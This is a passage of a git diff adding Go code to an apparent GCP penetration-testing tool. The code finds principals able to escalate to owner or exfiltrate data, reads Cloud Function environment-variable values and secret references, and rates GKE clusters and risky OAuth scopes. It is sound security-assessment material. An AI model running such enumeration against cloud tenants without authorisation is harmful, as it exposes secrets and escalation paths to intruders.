p.AccessType, p.ViaEdge, projectID) + } + } + + principals = append(principals, PrincipalAccess{ + Principal: p.Principal, + MemberID: p.MemberID, + MemberType: p.MemberType, + IsAdmin: p.IsAdmin, + IsServiceAccount: p.IsServiceAccount, + AccessType: p.AccessType, + ViaEdge: p.ViaEdge, + EdgePath: p.EdgePath, + ScopeType: scopeType, + ScopeID: scopeID, + ScopeName: scopeName, + }) + } + + if len(principals) > 0 { + findings = append(findings, DataExfilFinding{ + Technique: f.Technique, + Permission: f.Permission, + Service: f.Service, + Description: f.Description, + Exploitation: f.Exploitation, + Principals: principals, + }) + } + } + + return findings +} + +// analyzeDataExfilFromEdges is the legacy edge-based analysis (fallback) +func (s *FoxMapperService) analyzeDataExfilFromEdges(service string) []DataExfilFinding { + var findings []DataExfilFinding + techniques := GetDataExfilTechniques() + + for name, tech := range techniques { + // Filter by service if specified + if service != "" && tech.Service != service { + continue + } + + // Find principals with this permission via edges + var principals []PrincipalAccess + for _, edge := range s.Edges { + // Check if edge grants this permission + if strings.Contains(strings.ToLower(edge.Reason), strings.ToLower(tech.Permission)) || + strings.Contains(edge.ShortReason, tech.Permission) { + node := s.GetNode(edge.Source) + if node != nil { + scopeType, scopeID, scopeName := s.parseResourceScope(edge.Resource) + principals = append(principals, PrincipalAccess{ + Principal: node.Email, + MemberID: node.MemberID, + MemberType: node.MemberType, + IsAdmin: node.IsAdmin, + IsServiceAccount: node.MemberType == "serviceAccount", + AccessType: "via_privesc", + ViaEdge: true, + ScopeType: scopeType, + ScopeID: scopeID, + ScopeName: scopeName, + }) + } + } + } + + if len(principals) > 0 { + findings = append(findings, DataExfilFinding{ + Technique: name, + Permission: tech.Permission, + Service: tech.Service, + Description: tech.Description, + Exploitation: tech.Exploitation, + Principals: principals, + }) + } + } + + return findings +} + +// GetAllNodes returns all nodes in the graph +func (s *FoxMapperService) GetAllNodes() []Node { + return s.Nodes +} + +// GetAllEdges returns all edges in the graph +func (s *FoxMapperService) GetAllEdges() []Edge { + return s.Edges +} + +// GetPolicies returns all policies in the graph +func (s *FoxMapperService) GetPolicies() []Policy { + return s.Policies +} + +// ========================================== +// Wrong Admin (Hidden Admin) Analysis +// ========================================== + +// WrongAdminFinding represents a principal marked as admin without explicit admin roles +type WrongAdminFinding struct { + Principal string `json:"principal"` + MemberType string `json:"member_type"` + AdminLevel string `json:"admin_level"` // org, folder, project + Reasons []string `json:"reasons"` + ProjectID string `json:"project_id"` + FolderID string `json:"folder_id,omitempty"` // For folder-level admins + OrgID string `json:"org_id,omitempty"` // For org-level admins +} + +// ADMIN_ROLES are roles that grant explicit admin access +var ADMIN_ROLES = map[string]bool{ + "roles/owner": true, +} + +// SELF_ASSIGNMENT_ROLES are roles that can grant themselves admin access +var SELF_ASSIGNMENT_ROLES = map[string]bool{ + "roles/resourcemanager.projectIamAdmin": true, + "roles/resourcemanager.folderAdmin": true, + "roles/resourcemanager.organizationAdmin": true, + "roles/iam.securityAdmin": true, + "roles/iam.organizationRoleAdmin": true, +} + +// AnalyzeWrongAdmins finds principals marked as admin without explicit admin roles +// This is equivalent to running "foxmapper gcp query preset wrongadmin" +func (s *FoxMapperService) AnalyzeWrongAdmins() []WrongAdminFinding { + if !s.initialized { + return nil + } + + var findings []WrongAdminFinding + + for i := range s.Nodes { + node := &s.Nodes[i] + + // Skip non-admins + if !node.IsAdmin { + continue + } + + // Check if they have explicit admin role (roles/owner) + if s.hasExplicitAdminRole(node) { + continue + } + + // This is a "wrong admin" - get reasons why they're admin + reasons := s.getAdminReasons(node) + + // Get the highest admin resource ID (org, folder, or project) + folderID, orgID := s.getAdminResourceIDs(node) + + finding := WrongAdminFinding{ + Principal: node.Email, + MemberType: node.MemberType, + AdminLevel: node.AdminLevel, + Reasons: reasons, + ProjectID: node.ProjectID, + FolderID: folderID, + OrgID: orgID, + } + + if finding.AdminLevel == "" { + finding.AdminLevel = "project" + } + + findings = append(findings, finding) + } + + // Sort by admin level (org > folder > project) + sort.Slice(findings, func(i, j int) bool { + levelOrder := map[string]int{"org": 0, "folder": 1, "project": 2} + li, ok := levelOrder[findings[i].AdminLevel] + if !ok { + li = 3 + } + lj, ok := levelOrder[findings[j].AdminLevel] + if !ok { + lj = 3 + } + if li != lj { + return li < lj + } + return findings[i].Principal < findings[j].Principal + }) + + return findings +} + +// hasExplicitAdminRole checks if a node has roles/owner directly +func (s *FoxMapperService) hasExplicitAdminRole(node *Node) bool { + for _, policy := range s.Policies { + for _, binding := range policy.Bindings { + if !ADMIN_ROLES[binding.Role] { + continue + } + + for _, member := range binding.Members { + if s.memberMatchesNode(member, node) { + // Check for conditions - conditional admin is "wrong" admin + if binding.Condition != nil && len(binding.Condition) > 0 { + return false + } + return true + } + } + } + } + return false +} + +// memberMatchesNode checks if a member string matches a node +func (s *FoxMapperService) memberMatchesNode(member string, node *Node) bool { + memberLower := strings.ToLower(member) + nodeMemberLower := strings.ToLower(node.MemberID) + + // Direct match + if memberLower == nodeMemberLower { + return true + } + + // Check group memberships + if strings.HasPrefix(member, "group:") && len(node.GroupMemberships) > 0 { + groupEmail := strings.ToLower(strings.SplitN(member, ":", 2)[1]) + for _, gm := range node.GroupMemberships { + if strings.ToLower(gm) == groupEmail || strings.ToLower(gm) == memberLower { + return true + } + } + } + + return false +} + +// getAdminReasons returns reasons why a node is marked as admin +func (s *FoxMapperService) getAdminReasons(node *Node) []string { + var reasons []string + + for _, policy := range s.Policies { + policyLevel := s.getPolicyLevel(policy.Resource) + + for _, binding := range policy.Bindings { + if !SELF_ASSIGNMENT_ROLES[binding.Role] { + continue + } + + for _, member := range binding.Members { + if s.memberMatchesNode(member, node) { + conditionNote := "" + if binding.Condition != nil && len(binding.Condition) > 0 { + conditionNote = " (conditional)" + } + + switch binding.Role { + case "roles/resourcemanager.projectIamAdmin": + reasons = append(reasons, fmt.Sprintf( + "Has %s on %s%s - can set project IAM policy (grant themselves roles/owner)", + binding.Role, policy.Resource, conditionNote)) + case "roles/resourcemanager.folderAdmin": + reasons = append(reasons, fmt.Sprintf( + "Has %s on %s%s - can set folder IAM policy (grant themselves roles/owner at folder level)", + binding.Role, policy.Resource, conditionNote)) + case "roles/resourcemanager.organizationAdmin": + reasons = append(reasons, fmt.Sprintf( + "Has %s on %s%s - can set organization IAM policy (grant themselves roles/owner at org level)", + binding.Role, policy.Resource, conditionNote)) + case "roles/iam.securityAdmin": + reasons = append(reasons, fmt.Sprintf( + "Has %s on %s%s - can set IAM policies at %s level", + binding.Role, policy.Resource, conditionNote, policyLevel)) + case "roles/iam.organizationRoleAdmin": + reasons = append(reasons, fmt.Sprintf( + "Has %s on %s%s - can create/modify roles and has organization setIamPolicy", + binding.Role, policy.Resource, conditionNote)) + default: + reasons = append(reasons, fmt.Sprintf( + "Has %s on %s%s", binding.Role, policy.Resource, conditionNote)) + } + break + } + } + } + } + + // Check for custom roles with setIamPolicy permissions + for _, policy := range s.Policies { + for _, binding := range policy.Bindings { + // Skip standard roles we already checked + if SELF_ASSIGNMENT_ROLES[binding.Role] || ADMIN_ROLES[binding.Role] { + continue + } + + // Check if it's a custom role + if strings.HasPrefix(binding.Role, "projects/") || strings.HasPrefix(binding.Role, "organizations/") { + for _, member := range binding.Members { + if s.memberMatchesNode(member, node) { + roleLower := strings.ToLower(binding.Role) + if strings.Contains(roleLower, "admin") || strings.Contains(roleLower, "iam") { + reasons = append(reasons, fmt.Sprintf( + "Has custom role %s on %s - may grant setIamPolicy permissions", + binding.Role, policy.Resource)) + } + break + } + } + } + } + } + + if len(reasons) == 0 { + reasons = append(reasons, fmt.Sprintf( + "Marked as %s admin but couldn't determine specific role - may be due to inherited permissions or group membership", + node.AdminLevel)) + } + + return reasons +} + +// getPolicyLevel determines the level of a policy resource +func (s *FoxMapperService) getPolicyLevel(resource string) string { + if strings.HasPrefix(resource, "organizations/") { + return "organization" + } else if strings.HasPrefix(resource, "folders/") { + return "folder" + } + return "project" +} + +// getAdminResourceIDs returns the folder ID and org ID where the node has admin access +// Returns the highest level resources (org > folder > project) +func (s *FoxMapperService) getAdminResourceIDs(node *Node) (folderID, orgID string) { + for _, policy := range s.Policies { + for _, binding := range policy.Bindings { + // Check for self-assignment roles (makes them admin) + if !SELF_ASSIGNMENT_ROLES[binding.Role] { + continue + } + + for _, member := range binding.Members { + if s.memberMatchesNode(member, node) { + // Extract resource ID based on type + if strings.HasPrefix(policy.Resource, "organizations/") { + orgID = strings.TrimPrefix(policy.Resource, "organizations/") + } else if strings.HasPrefix(policy.Resource, "folders/") { + // Only set folderID if we don't already have org admin + // (org level is higher) + if orgID == "" { + folderID = strings.TrimPrefix(policy.Resource, "folders/") + } + } + } + } + } + } + return folderID, orgID +} + +// parseResourceScope extracts scope information from a resource string +// Returns scopeType, scopeID, scopeName +// Resource formats: "organizations/123", "folders/456", "projects/myproject", etc. +func (s *FoxMapperService) parseResourceScope(resource string) (scopeType, scopeID, scopeName string) { + if resource == "" { + return "unknown", "", "" + } + + if strings.HasPrefix(resource, "organizations/") { + scopeType = "organization" + scopeID = strings.TrimPrefix(resource, "organizations/") + // Try to get display name from metadata if available + scopeName = scopeID + } else if strings.HasPrefix(resource, "folders/") { + scopeType = "folder" + scopeID = strings.TrimPrefix(resource, "folders/") + scopeName = scopeID + } else if strings.HasPrefix(resource, "projects/") { + scopeType = "project" + scopeID = strings.TrimPrefix(resource, "projects/") + scopeName = scopeID + } else { + // Resource-level permission (e.g., storage bucket, BigQuery dataset) + scopeType = "resource" + scopeID = resource + scopeName = resource + } + + return scopeType, scopeID, scopeName +} + +// deriveScopeFromContext derives scope information when the Resource field is empty +// This is needed for pre-computed findings that don't include the resource field. +// For "project_iam" access type, we know the permission was granted at project level. +// For "via_privesc" access type, we look up the edge to find where the permission was granted. +func (s *FoxMapperService) deriveScopeFromContext(memberID, accessType string, viaEdge bool, fallbackProjectID string) (scopeType, scopeID, scopeName string) { + // For project_iam access, the permission was granted at the project level + if accessType == "project_iam" { + return "project", fallbackProjectID, fallbackProjectID + } + + // For via_privesc with viaEdge=true, look up the edge to find the resource + if viaEdge && accessType == "via_privesc" { + // Find the first edge from this principal to determine scope + for _, edge := range s.Edges { + if edge.Source == memberID { + if edge.Resource != "" { + return s.parseResourceScope(edge.Resource) + } + } + } + } + + // Fallback: if we have a project ID, assume project-level + if fallbackProjectID != "" { + return "project", fallbackProjectID, fallbackProjectID + } + + return "unknown", "", "" +} diff --git a/gcp/services/functionsService/functionsService.go b/gcp/services/functionsService/functionsService.go new file mode 100644 index 00000000..12b8c930 --- /dev/null +++ b/gcp/services/functionsService/functionsService.go @@ -0,0 +1,347 @@ +package functionsservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + cloudfunctions "google.golang.org/api/cloudfunctions/v2" +) + +type FunctionsService struct{ + session *gcpinternal.SafeSession +} + +func New() *FunctionsService { + return &FunctionsService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *FunctionsService { + return &FunctionsService{ + session: session, + } +} + +// FunctionInfo holds Cloud Function details with security-relevant information +type FunctionInfo struct { + // Basic info + Name string + ProjectID string + Region string + State string + Description string + + // Runtime info + Runtime string + EntryPoint string + BuildID string + UpdateTime string + + // Security-relevant configuration + ServiceAccount string + IngressSettings string // ALL_TRAFFIC, INTERNAL_ONLY, INTERNAL_AND_GCLB + VPCConnector string + VPCEgressSettings string // PRIVATE_RANGES_ONLY, ALL_TRAFFIC + AllTrafficOnLatest bool + + // Resource configuration (new enhancements) + AvailableMemoryMB int64 // Memory in MB + AvailableCPU string // CPU (e.g., "1", "2") + TimeoutSeconds int64 // Timeout in seconds + MaxInstanceCount int64 // Max concurrent instances + MinInstanceCount int64 // Min instances (cold start prevention) + MaxInstanceRequestConcurrency int64 // Max concurrent requests per instance + + // Trigger info + TriggerType string // HTTP, Pub/Sub, Cloud Storage, etc. + TriggerURL string // For HTTP functions + TriggerEventType string + TriggerResource string + TriggerRetryPolicy string // RETRY_POLICY_RETRY, RETRY_POLICY_DO_NOT_RETRY + + // Environment variables + EnvVarCount int + SecretEnvVarCount int + SecretVolumeCount int + + // IAM (if retrieved) + IAMBindings []IAMBinding // All IAM bindings for this function + IsPublic bool // allUsers or allAuthenticatedUsers can invoke + + // Detailed env var and secret info (like Cloud Run) + EnvVars []EnvVarInfo // All environment variables with values + SecretEnvVarNames []string // Names of secret env vars + SecretVolumeNames []string // Names of secret volumes + + // Legacy fields (kept for compatibility) + EnvVarNames []string // Names of env vars (may hint at secrets) + SourceLocation string // GCS or repo source location + SourceType string // GCS, Repository +} + +// EnvVarInfo represents an environment variable configuration +type EnvVarInfo struct { + Name string + Value string // Direct value (may be empty if using secret ref) + Source string // "direct" or "secret-manager" + SecretName string // For Secret Manager references + SecretVersion string // Version (e.g., "latest", "1") +} + +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string + Member string +} + +// getService returns a Cloud Functions v2 service instance, using cached wrapper if session is available +func (fs *FunctionsService) getService(ctx context.Context) (*cloudfunctions.Service, error) { + if fs.session != nil { + return sdk.CachedGetCloudFunctionsServiceV2(ctx, fs.session) + } + return cloudfunctions.NewService(ctx) +} + +// Functions retrieves all Cloud Functions in a project across all regions +func (fs *FunctionsService) Functions(projectID string) ([]FunctionInfo, error) { + ctx := context.Background() + + service, err := fs.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudfunctions.googleapis.com") + } + + var functions []FunctionInfo + + // List functions across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + call := service.Projects.Locations.Functions.List(parent) + err = call.Pages(ctx, func(page *cloudfunctions.ListFunctionsResponse) error { + for _, fn := range page.Functions { + info := parseFunctionInfo(fn, projectID) + + // Try to get IAM policy + iamPolicy, iamErr := fs.getFunctionIAMPolicy(service, fn.Name) + if iamErr == nil && iamPolicy != nil { + info.IAMBindings, info.IsPublic = parseIAMBindings(iamPolicy) + } + + functions = append(functions, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudfunctions.googleapis.com") + } + + return functions, nil +} + +// parseFunctionInfo extracts relevant information from a Cloud Function +func parseFunctionInfo(fn *cloudfunctions.Function, projectID string) FunctionInfo { + info := FunctionInfo{ + Name: extractFunctionName(fn.Name), + ProjectID: projectID, + State: fn.State, + } + + // Extract region from function name + // Format: projects/{project}/locations/{location}/functions/{name} + parts := strings.Split(fn.Name, "/") + if len(parts) >= 4 { + info.Region = parts[3] + } + + // Build configuration + if fn.BuildConfig != nil { + info.Runtime = fn.BuildConfig.Runtime + info.EntryPoint = fn.BuildConfig.EntryPoint + info.BuildID = fn.BuildConfig.Build + + // Extract source location (pentest-relevant) + if fn.BuildConfig.Source != nil { + if fn.BuildConfig.Source.StorageSource != nil { + info.SourceType = "GCS" + info.SourceLocation = fmt.Sprintf("gs://%s/%s", + fn.BuildConfig.Source.StorageSource.Bucket, + fn.BuildConfig.Source.StorageSource.Object) + } else if fn.BuildConfig.Source.RepoSource != nil { + info.SourceType = "Repository" + info.SourceLocation = fmt.Sprintf("%s/%s@%s", + fn.BuildConfig.Source.RepoSource.ProjectId, + fn.BuildConfig.Source.RepoSource.RepoName, + fn.BuildConfig.Source.RepoSource.BranchName) + } + } + } + + // Service configuration + if fn.ServiceConfig != nil { + info.ServiceAccount = fn.ServiceConfig.ServiceAccountEmail + info.IngressSettings = fn.ServiceConfig.IngressSettings + info.VPCConnector = fn.ServiceConfig.VpcConnector + info.VPCEgressSettings = fn.ServiceConfig.VpcConnectorEgressSettings + info.AllTrafficOnLatest = fn.ServiceConfig.AllTrafficOnLatestRevision + + // Resource configuration (new enhancements) + if fn.ServiceConfig.AvailableMemory != "" { + // Parse memory string (e.g., "256M", "1G") + memStr := fn.ServiceConfig.AvailableMemory + if strings.HasSuffix(memStr, "M") { + if val, err := parseMemoryMB(memStr); err == nil { + info.AvailableMemoryMB = val + } + } else if strings.HasSuffix(memStr, "G") { + if val, err := parseMemoryMB(memStr); err == nil { + info.AvailableMemoryMB = val + } + } + } + info.AvailableCPU = fn.ServiceConfig.AvailableCpu + info.TimeoutSeconds = fn.ServiceConfig.TimeoutSeconds + info.MaxInstanceCount = fn.ServiceConfig.MaxInstanceCount + info.MinInstanceCount = fn.ServiceConfig.MinInstanceCount + info.MaxInstanceRequestConcurrency = fn.ServiceConfig.MaxInstanceRequestConcurrency + + // Extract environment variables with values + if fn.ServiceConfig.EnvironmentVariables != nil { + info.EnvVarCount = len(fn.ServiceConfig.EnvironmentVariables) + for key, value := range fn.ServiceConfig.EnvironmentVariables { + info.EnvVarNames = append(info.EnvVarNames, key) + info.EnvVars = append(info.EnvVars, EnvVarInfo{ + Name: key, + Value: value, + Source: "direct", + }) + } + } + + // Extract secret environment variables + if fn.ServiceConfig.SecretEnvironmentVariables != nil { + info.SecretEnvVarCount = len(fn.ServiceConfig.SecretEnvironmentVariables) + for _, secret := range fn.ServiceConfig.SecretEnvironmentVariables { + if secret != nil { + info.SecretEnvVarNames = append(info.SecretEnvVarNames, secret.Key) + // Extract version from the secret reference + version := "latest" + if secret.Version != "" { + version = secret.Version + } + info.EnvVars = append(info.EnvVars, EnvVarInfo{ + Name: secret.Key, + Source: "secret-manager", + SecretName: secret.Secret, + SecretVersion: version, + }) + } + } + } + + // Extract secret volume names + if fn.ServiceConfig.SecretVolumes != nil { + info.SecretVolumeCount = len(fn.ServiceConfig.SecretVolumes) + for _, vol := range fn.ServiceConfig.SecretVolumes { + if vol != nil { + info.SecretVolumeNames = append(info.SecretVolumeNames, vol.Secret) + } + } + } + + // Get HTTP trigger URL from service config + info.TriggerURL = fn.ServiceConfig.Uri + } + + // Event trigger configuration + if fn.EventTrigger != nil { + info.TriggerType = "Event" + info.TriggerEventType = fn.EventTrigger.EventType + info.TriggerResource = fn.EventTrigger.PubsubTopic + if info.TriggerResource == "" { + info.TriggerResource = fn.EventTrigger.Channel + } + } else if info.TriggerURL != "" { + info.TriggerType = "HTTP" + } + + info.Description = fn.Description + info.UpdateTime = fn.UpdateTime + + return info +} + +// getFunctionIAMPolicy retrieves the IAM policy for a function +func (fs *FunctionsService) getFunctionIAMPolicy(service *cloudfunctions.Service, functionName string) (*cloudfunctions.Policy, error) { + ctx := context.Background() + + policy, err := service.Projects.Locations.Functions.GetIamPolicy(functionName).Context(ctx).Do() + if err != nil { + return nil, err + } + + return policy, nil +} + +// parseIAMBindings extracts all IAM bindings and checks for public access +func parseIAMBindings(policy *cloudfunctions.Policy) ([]IAMBinding, bool) { + var bindings []IAMBinding + isPublic := false + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + + // Check for public access on invoker roles + if (binding.Role == "roles/cloudfunctions.invoker" || + binding.Role == "roles/run.invoker") && + (member == "allUsers" || member == "allAuthenticatedUsers") { + isPublic = true + } + } + } + + return bindings, isPublic +} + +// extractFunctionName extracts just the function name from the full resource name +func extractFunctionName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// parseMemoryMB parses a memory string like "256M" or "1G" to MB +func parseMemoryMB(memStr string) (int64, error) { + memStr = strings.TrimSpace(memStr) + if len(memStr) == 0 { + return 0, fmt.Errorf("empty memory string") + } + + unit := memStr[len(memStr)-1] + valueStr := memStr[:len(memStr)-1] + + var value int64 + _, err := fmt.Sscanf(valueStr, "%d", &value) + if err != nil { + return 0, err + } + + switch unit { + case 'M', 'm': + return value, nil + case 'G', 'g': + return value * 1024, nil + case 'K', 'k': + return value / 1024, nil + default: + return 0, fmt.Errorf("unknown unit: %c", unit) + } +} diff --git a/gcp/services/gkeService/gkeService.go b/gcp/services/gkeService/gkeService.go new file mode 100644 index 00000000..48208de0 --- /dev/null +++ b/gcp/services/gkeService/gkeService.go @@ -0,0 +1,426 @@ +package gkeservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + container "google.golang.org/api/container/v1" +) + +type GKEService struct { + session *gcpinternal.SafeSession +} + +// New creates a new GKEService (legacy - uses ADC directly) +func New() *GKEService { + return &GKEService{} +} + +// NewWithSession creates a GKEService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *GKEService { + return &GKEService{session: session} +} + +// getService returns a container service, using session if available +func (gs *GKEService) getService(ctx context.Context) (*container.Service, error) { + if gs.session != nil { + return sdk.CachedGetContainerService(ctx, gs.session) + } + return container.NewService(ctx) +} + +// ClusterInfo holds GKE cluster details with security-relevant information +type ClusterInfo struct { + // Basic info + Name string + ProjectID string + Location string // Zone or Region + Status string + Description string + + // Version info + CurrentMasterVersion string + CurrentNodeVersion string + ReleaseChannel string + + // Network configuration + Network string + Subnetwork string + ClusterIPv4CIDR string + ServicesIPv4CIDR string + Endpoint string // Master endpoint + PrivateCluster bool + MasterAuthorizedOnly bool + MasterAuthorizedCIDRs []string + + // Security configuration + NetworkPolicy bool + PodSecurityPolicy bool // Deprecated but may still be in use + BinaryAuthorization bool + ShieldedNodes bool + SecureBoot bool + IntegrityMonitoring bool + WorkloadIdentity string // Workload Identity Pool + NodeServiceAccount string + + // Authentication + LegacyABAC bool // Legacy ABAC authorization + IssueClientCertificate bool + BasicAuthEnabled bool // Deprecated + + // Logging and Monitoring + LoggingService string + MonitoringService string + + // Node pool info (aggregated) + NodePoolCount int + TotalNodeCount int + AutoscalingEnabled bool + + // GKE Autopilot + Autopilot bool + + // Node Auto-provisioning + NodeAutoProvisioning bool + + // Maintenance configuration + MaintenanceWindow string + MaintenanceExclusions []string + + // Addons + ConfigConnector bool + IstioEnabled bool // Anthos Service Mesh / Istio + + // Security issues detected + SecurityIssues []string +} + +// NodePoolInfo holds node pool details +type NodePoolInfo struct { + ClusterName string + Name string + ProjectID string + Location string + Status string + NodeCount int + MachineType string + DiskSizeGb int64 + DiskType string + ImageType string + ServiceAccount string + AutoRepair bool + AutoUpgrade bool + SecureBoot bool + IntegrityMonitoring bool + Preemptible bool + Spot bool + OAuthScopes []string + // Pentest-specific fields + HasCloudPlatformScope bool // Full access to GCP + ScopeSummary string // Human-readable scope summary (e.g., "Full Access", "Restricted") + RiskyScopes []string // Scopes that enable attacks +} + +// Clusters retrieves all GKE clusters in a project +func (gs *GKEService) Clusters(projectID string) ([]ClusterInfo, []NodePoolInfo, error) { + ctx := context.Background() + + service, err := gs.getService(ctx) + if err != nil { + return nil, nil, gcpinternal.ParseGCPError(err, "container.googleapis.com") + } + + // List clusters across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + resp, err := service.Projects.Locations.Clusters.List(parent).Do() + if err != nil { + return nil, nil, gcpinternal.ParseGCPError(err, "container.googleapis.com") + } + + var clusters []ClusterInfo + var nodePools []NodePoolInfo + + for _, cluster := range resp.Clusters { + info := parseClusterInfo(cluster, projectID) + clusters = append(clusters, info) + + // Parse node pools + for _, np := range cluster.NodePools { + npInfo := parseNodePoolInfo(np, cluster.Name, projectID, cluster.Location) + nodePools = append(nodePools, npInfo) + } + } + + return clusters, nodePools, nil +} + +// parseClusterInfo extracts security-relevant information from a GKE cluster +func parseClusterInfo(cluster *container.Cluster, projectID string) ClusterInfo { + info := ClusterInfo{ + Name: cluster.Name, + ProjectID: projectID, + Location: cluster.Location, + Status: cluster.Status, + Description: cluster.Description, + CurrentMasterVersion: cluster.CurrentMasterVersion, + CurrentNodeVersion: cluster.CurrentNodeVersion, + Endpoint: cluster.Endpoint, + Network: cluster.Network, + Subnetwork: cluster.Subnetwork, + ClusterIPv4CIDR: cluster.ClusterIpv4Cidr, + ServicesIPv4CIDR: cluster.ServicesIpv4Cidr, + LoggingService: cluster.LoggingService, + MonitoringService: cluster.MonitoringService, + SecurityIssues: []string{}, + } + + // Release channel + if cluster.ReleaseChannel != nil { + info.ReleaseChannel = cluster.ReleaseChannel.Channel + } + + // Private cluster configuration + if cluster.PrivateClusterConfig != nil { + info.PrivateCluster = cluster.PrivateClusterConfig.EnablePrivateNodes + if cluster.PrivateClusterConfig.EnablePrivateEndpoint { + info.Endpoint = cluster.PrivateClusterConfig.PrivateEndpoint + } + } + + // Master authorized networks + if cluster.MasterAuthorizedNetworksConfig != nil { + info.MasterAuthorizedOnly = cluster.MasterAuthorizedNetworksConfig.Enabled + for _, cidr := range cluster.MasterAuthorizedNetworksConfig.CidrBlocks { + info.MasterAuthorizedCIDRs = append(info.MasterAuthorizedCIDRs, cidr.CidrBlock) + } + } + + // Network policy + if cluster.NetworkPolicy != nil { + info.NetworkPolicy = cluster.NetworkPolicy.Enabled + } + + // Binary authorization + if cluster.BinaryAuthorization != nil { + info.BinaryAuthorization = cluster.BinaryAuthorization.Enabled + } + + // Shielded nodes + if cluster.ShieldedNodes != nil { + info.ShieldedNodes = cluster.ShieldedNodes.Enabled + } + + // Workload Identity + if cluster.WorkloadIdentityConfig != nil { + info.WorkloadIdentity = cluster.WorkloadIdentityConfig.WorkloadPool + } + + // Legacy ABAC (should be disabled) + if cluster.LegacyAbac != nil { + info.LegacyABAC = cluster.LegacyAbac.Enabled + } + + // Master auth (legacy) + if cluster.MasterAuth != nil { + info.IssueClientCertificate = cluster.MasterAuth.ClientCertificateConfig != nil && + cluster.MasterAuth.ClientCertificateConfig.IssueClientCertificate + // Check for basic auth (deprecated) + if cluster.MasterAuth.Username != "" { + info.BasicAuthEnabled = true + } + } + + // Count node pools and nodes + info.NodePoolCount = len(cluster.NodePools) + for _, np := range cluster.NodePools { + if np.Autoscaling != nil && np.Autoscaling.Enabled { + info.AutoscalingEnabled = true + } + info.TotalNodeCount += int(np.InitialNodeCount) + + // Get node service account from first pool + if info.NodeServiceAccount == "" && np.Config != nil { + info.NodeServiceAccount = np.Config.ServiceAccount + } + + // Check shielded node config + if np.Config != nil && np.Config.ShieldedInstanceConfig != nil { + info.SecureBoot = np.Config.ShieldedInstanceConfig.EnableSecureBoot + info.IntegrityMonitoring = np.Config.ShieldedInstanceConfig.EnableIntegrityMonitoring + } + } + + // GKE Autopilot mode + if cluster.Autopilot != nil { + info.Autopilot = cluster.Autopilot.Enabled + } + + // Node Auto-provisioning + if cluster.Autoscaling != nil { + info.NodeAutoProvisioning = cluster.Autoscaling.EnableNodeAutoprovisioning + } + + // Maintenance configuration + if cluster.MaintenancePolicy != nil && cluster.MaintenancePolicy.Window != nil { + window := cluster.MaintenancePolicy.Window + if window.DailyMaintenanceWindow != nil { + info.MaintenanceWindow = fmt.Sprintf("Daily at %s", window.DailyMaintenanceWindow.StartTime) + } else if window.RecurringWindow != nil { + info.MaintenanceWindow = fmt.Sprintf("Recurring: %s", window.RecurringWindow.Recurrence) + } + // Maintenance exclusions + for name := range window.MaintenanceExclusions { + info.MaintenanceExclusions = append(info.MaintenanceExclusions, name) + } + } + + // Addons configuration + if cluster.AddonsConfig != nil { + // Config Connector + if cluster.AddonsConfig.ConfigConnectorConfig != nil { + info.ConfigConnector = cluster.AddonsConfig.ConfigConnectorConfig.Enabled + } + // Note: IstioConfig was deprecated and removed from the GKE API + // Anthos Service Mesh (ASM) is now the recommended approach + } + + // Identify security issues + info.SecurityIssues = identifySecurityIssues(info) + + return info +} + +// parseNodePoolInfo extracts information from a node pool +func parseNodePoolInfo(np *container.NodePool, clusterName, projectID, location string) NodePoolInfo { + info := NodePoolInfo{ + ClusterName: clusterName, + Name: np.Name, + ProjectID: projectID, + Location: location, + Status: np.Status, + NodeCount: int(np.InitialNodeCount), + } + + if np.Config != nil { + info.MachineType = np.Config.MachineType + info.DiskSizeGb = np.Config.DiskSizeGb + info.DiskType = np.Config.DiskType + info.ImageType = np.Config.ImageType + info.ServiceAccount = np.Config.ServiceAccount + info.OAuthScopes = np.Config.OauthScopes + info.Preemptible = np.Config.Preemptible + info.Spot = np.Config.Spot + + if np.Config.ShieldedInstanceConfig != nil { + info.SecureBoot = np.Config.ShieldedInstanceConfig.EnableSecureBoot + info.IntegrityMonitoring = np.Config.ShieldedInstanceConfig.EnableIntegrityMonitoring + } + + // Analyze OAuth scopes for risky permissions + info.HasCloudPlatformScope, info.ScopeSummary, info.RiskyScopes = analyzeOAuthScopes(np.Config.OauthScopes) + } + + if np.Management != nil { + info.AutoRepair = np.Management.AutoRepair + info.AutoUpgrade = np.Management.AutoUpgrade + } + + return info +} + +// analyzeOAuthScopes identifies risky OAuth scopes and returns a summary +func analyzeOAuthScopes(scopes []string) (hasCloudPlatform bool, scopeSummary string, riskyScopes []string) { + riskyPatterns := map[string]string{ + "https://www.googleapis.com/auth/cloud-platform": "Full GCP access", + "https://www.googleapis.com/auth/compute": "Full Compute Engine access", + "https://www.googleapis.com/auth/devstorage.full_control": "Full Cloud Storage access", + "https://www.googleapis.com/auth/devstorage.read_write": "Read/write Cloud Storage", + "https://www.googleapis.com/auth/logging.admin": "Logging admin (can delete logs)", + "https://www.googleapis.com/auth/source.full_control": "Full source repo access", + "https://www.googleapis.com/auth/sqlservice.admin": "Cloud SQL admin", + } + + for _, scope := range scopes { + if scope == "https://www.googleapis.com/auth/cloud-platform" { + hasCloudPlatform = true + } + if desc, found := riskyPatterns[scope]; found { + riskyScopes = append(riskyScopes, fmt.Sprintf("%s: %s", scope, desc)) + } + } + + // Determine scope summary + // GKE default scopes (when not explicitly set) typically include: + // - logging.write, monitoring, devstorage.read_only, service.management.readonly, servicecontrol, trace.append + if hasCloudPlatform { + scopeSummary = "Full Access" + } else if len(riskyScopes) > 0 { + // Has some risky scopes but not full access + scopeSummary = fmt.Sprintf("Broad (%d risky)", len(riskyScopes)) + } else if len(scopes) == 0 { + // Empty scopes likely means default 